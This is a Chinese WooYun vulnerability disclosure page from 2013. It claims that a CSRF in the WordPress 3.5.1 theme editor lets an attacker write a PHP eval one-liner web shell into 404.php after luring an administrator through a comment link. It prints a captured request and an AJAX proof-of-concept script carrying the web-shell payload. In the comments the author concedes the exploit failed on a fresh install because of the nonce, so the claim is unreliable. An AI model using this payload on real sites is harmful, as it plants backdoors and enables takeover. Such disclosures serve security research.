当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-020878

漏洞标题:wordpress后台CSRF不严,管理员访问某些链接可拿shell

相关厂商:wordpress

漏洞作者: 小贱人

提交时间:2013-03-29 12:43

修复时间:2013-06-27 12:44

公开时间:2013-06-27 12:44

漏洞类型:CSRF

危害等级:中

自评Rank:5

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-03-29: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-06-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

wordpress3.5.1后台修改主题模版处防CSRF不严,前台评论可加入超链接,可写上诱惑性东西 骗取管理员点击后写入一句话木马

详细说明:

进入后台-外观-编辑。选择编辑Twenty Twelve主题下的404.php文件。将原内容去掉,换成一句话木马,同时打开抓包工具。

1.png


更新后抓到包 

post http://localhost/wp/wp-admin/theme-editor.php
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp/wp-admin/theme-editor.php?file=404.php&theme=twentytwelve
Cookie: wordpress_1233097993469c07c80a9cb529880b71=admin%7C1364700254%7Cb875aa22d9bb88383aa6f9b1628dd86b; wp-settings-time-1=1364445495; comment_author_1233097993469c07c80a9cb529880b71=test; comment_author_email_1233097993469c07c80a9cb529880b71=632117384%40qq.com; wp-settings-1=editor%3Dhtml; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_1233097993469c07c80a9cb529880b71=admin%7C1364700254%7C082956c79c01926f6f107ccd131dade7; s5wJ_2132_saltkey=uNFgCP80; s5wJ_2132_lastvisit=1364366389; s5wJ_2132_ulastactivity=591affdyS6zMRtF88Jad%2BTVr47oX95MIizEQOFn8RMF%2BN%2FpUUHdw
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 268
_wpnonce=b6cda66293&_wp_http_referer=%2Fwp%2Fwp-admin%2Ftheme-editor.php%3Ffile%3D404.php%26theme%3Dtwentytwelve&newcontent=%3C%3Fphp+eval%28%24_GET%5Ba%5D%29%3B%3F%3E&action=update&file=404.php&theme=twentytwelve&scrollto=0&submit=%E6%9B%B4%E6%96%B0%E6%96%87%E4%BB%B6


由于本地演示,用AJAX进行CSRF攻击。
编写localhost/wp.html文件。内容为

<script>
function CreateRquest(){
var httpRequest;
try{
httpRequest=new ActiveXObject("Msxml2.XMLHTTP");
}catch(e){
try{
httpRequest=new ActiveXObject("Microsoft.XMLHTTP");
}catch(e1){
httpRequest=new XMLHttpRequest();
}
}
return httpRequest;
}
var request=CreateRquest();
request.open("post","http://localhost/wp/wp-admin/theme-editor.php",true);
request.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
var a="_wpnonce=b6cda66293&_wp_http_referer=%2Fwp%2Fwp-admin%2Ftheme-editor.php%3Ffile%3D404.php%26theme%3Dtwentytwelve&newcontent=<?php eval($_GET[a]);?>&action=update&file=404.php&theme=twentytwelve&scrollto=0&submit=%E6%9B%B4%E6%96%B0%E6%96%87%E4%BB%B6";
request.send(a);
</script>


将被修改的404.PHP恢复,并且在前台评论写入<a href="http://localhost/wp.html">管理员,有一篇文章也讲到了这个问题
管理员登录后台查看评论。点击链接后
Twenty Twelve主题下的404.php已被成功修改为一句话木马

2.png


访问一句话木马

3.png


攻击成功,AJAX仅为演示,实战中可用JS控制表单自动提交来实现跨域传输数据。

漏洞证明:

管理员点击相关链接后,成功在404页面写入一句话木马 并访问成功

.jpg


AJAX仅为本地测试用,实战中可在恶意页面中用JS控制表单自动提交。

修复方案:

你们比我懂

版权声明:转载请注明来源 小贱人@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:4 (WooYun评价)

漏洞评价:

评论

  1. 2013-03-29 12:45 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:17 | 当我又回首一切,这个世界会好吗?)

    wordpress有token的吧

  2. 2013-03-29 12:45 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:17 | 当我又回首一切,这个世界会好吗?)

    @xsser 不过利用那个swf的xss倒是可以一搞

  3. 2013-03-29 13:07 | Rookie ( 普通白帽子 | Rank:288 漏洞数:78 | 123)

    @xsser 自问自答 真的很强

  4. 2013-03-29 14:29 | 瘦蛟舞 认证白帽子 ( 普通白帽子 | Rank:687 漏洞数:66 | 铁甲依然在)

    @痩蛟舞 我也at下自己看

  5. 2013-03-29 16:08 | saline ( 普通白帽子 | Rank:231 漏洞数:29 | Focus On Web Secur1ty)

    @saline 表示关注

  6. 2013-03-29 16:48 | 空城 ( 实习白帽子 | Rank:94 漏洞数:11 | 这个人很懒,什么也没有留下)

    @小贱人 @xsser 那个token怎么bypass?

  7. 2013-03-29 16:49 | 小贱人 ( 路人 | Rank:4 漏洞数:3 | 资深菜鸟,)

    第一个测试的CSRF是添加管理员用户,但发现了不可预测的token.每次重启服务器token都会变化,但重启前无论管理员登录登出TOKEN都相同。第二个测试的CSRF是修改模版。写好POC后发现服务器重启多少次后POC都有效,于是以为CSRF可用,上报乌云。收到xsser的邮件后,重新安装了WORDPRESS。发现POC无法用。诡异的WORDPRESS。在此说明,以避骗token之嫌

  8. 2013-03-29 16:50 | 小贱人 ( 路人 | Rank:4 漏洞数:3 | 资深菜鸟,)

    说错 是骗rank之嫌

  9. 2013-03-31 17:29 | Drizzle.Risk ( 普通白帽子 | Rank:255 漏洞数:19 | You have an error in your SQL syntax; ch...)

    关注..

  10. 2013-06-27 16:11 | ( 路人 | Rank:14 漏洞数:4 | 小夜,一个苦逼程序员)

    你那写一句话也太麻烦了吧!